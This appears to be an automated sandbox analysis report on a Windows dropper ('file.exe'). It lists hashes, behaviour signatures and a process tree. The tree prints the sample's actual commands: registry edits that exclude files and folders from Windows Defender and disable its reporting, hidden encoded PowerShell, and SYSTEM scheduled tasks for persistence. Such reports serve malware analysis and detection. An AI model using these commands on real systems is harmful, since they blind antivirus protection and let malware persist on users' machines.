Analysis
-
max time kernel
92s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
-
submitted
26-09-2022 02:02
General
-
Target
file.exe
-
Size
7.2MB
-
MD5
a82f607d60d6c73e688adcee6924b391
-
SHA1
b3864cb110bec5fb33eb40d1bd0db8a9e4c96889
-
SHA256
69dd5e0ff166b54e18128b90d2c55194995ef43bf8b30554eb25e43c50725bcc
-
SHA512
f5e6a90dd3fd2eb03bd8fa1db92027f262737978ee9679298b1166275196ae0833757fa3fd281e091aae9879edfd7c38d57986bdc8fa0c7de51486292e8732e1
-
SSDEEP
196608:91OwPlWg6VnJzdg3C5Fsm7pGCEGm/3jiXaZCE:3OsnUJRgy5umEz3maH
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
-
Executes dropped EXE 4 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 3 IoCs
-
Drops desktop.ini file(s) 1 IoCs
-
Drops file in System32 directory 31 IoCs
-
Drops file in Program Files directory 14 IoCs
-
Drops file in Windows directory 4 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 4 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 40 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS69DA.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS6D16.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gLsIiRHQK" /SC once /ST 03:49:08 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gLsIiRHQK"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gLsIiRHQK"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bNpHvRwEXzIclVjPnA" /SC once /ST 04:03:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\erzvrHvcaZerrtDXV\dMUiSaChFqmKilH\eegPKbX.exe\" hV /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Users\Admin\AppData\Local\Temp\erzvrHvcaZerrtDXV\dMUiSaChFqmKilH\eegPKbX.exeC:\Users\Admin\AppData\Local\Temp\erzvrHvcaZerrtDXV\dMUiSaChFqmKilH\eegPKbX.exe hV /site_id 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SfrSbxhXbhVCC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SfrSbxhXbhVCC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dWSjIMqfbdUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dWSjIMqfbdUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jFRyDUODU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jFRyDUODU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jWYIfSfaEDaYgVKkjRR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jWYIfSfaEDaYgVKkjRR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oCfcnVibUgRU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oCfcnVibUgRU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wMiAwpnFkXrivKVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wMiAwpnFkXrivKVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\erzvrHvcaZerrtDXV\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\erzvrHvcaZerrtDXV\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\lhYCvcGAfKQiHdyz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\lhYCvcGAfKQiHdyz\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SfrSbxhXbhVCC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SfrSbxhXbhVCC" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SfrSbxhXbhVCC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dWSjIMqfbdUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dWSjIMqfbdUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jFRyDUODU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jFRyDUODU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jWYIfSfaEDaYgVKkjRR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jWYIfSfaEDaYgVKkjRR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oCfcnVibUgRU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oCfcnVibUgRU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wMiAwpnFkXrivKVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wMiAwpnFkXrivKVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\erzvrHvcaZerrtDXV /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\erzvrHvcaZerrtDXV /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\lhYCvcGAfKQiHdyz /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\lhYCvcGAfKQiHdyz /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gdSgqNGkM" /SC once /ST 03:29:11 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gdSgqNGkM"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gdSgqNGkM"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ZfXrITCAwqWWdJVle" /SC once /ST 00:04:38 /RU "SYSTEM" /TR "\"C:\Windows\Temp\lhYCvcGAfKQiHdyz\TUiVwphJwWVEcGl\oNShAWy.exe\" Rv /site_id 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ZfXrITCAwqWWdJVle"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\Temp\lhYCvcGAfKQiHdyz\TUiVwphJwWVEcGl\oNShAWy.exeC:\Windows\Temp\lhYCvcGAfKQiHdyz\TUiVwphJwWVEcGl\oNShAWy.exe Rv /site_id 525403 /S1⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bNpHvRwEXzIclVjPnA"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\jFRyDUODU\jlBrCn.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "bcMXixuPVnLBvIi" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bcMXixuPVnLBvIi2" /F /xml "C:\Program Files (x86)\jFRyDUODU\AGdqfDr.xml" /RU "SYSTEM"2⤵
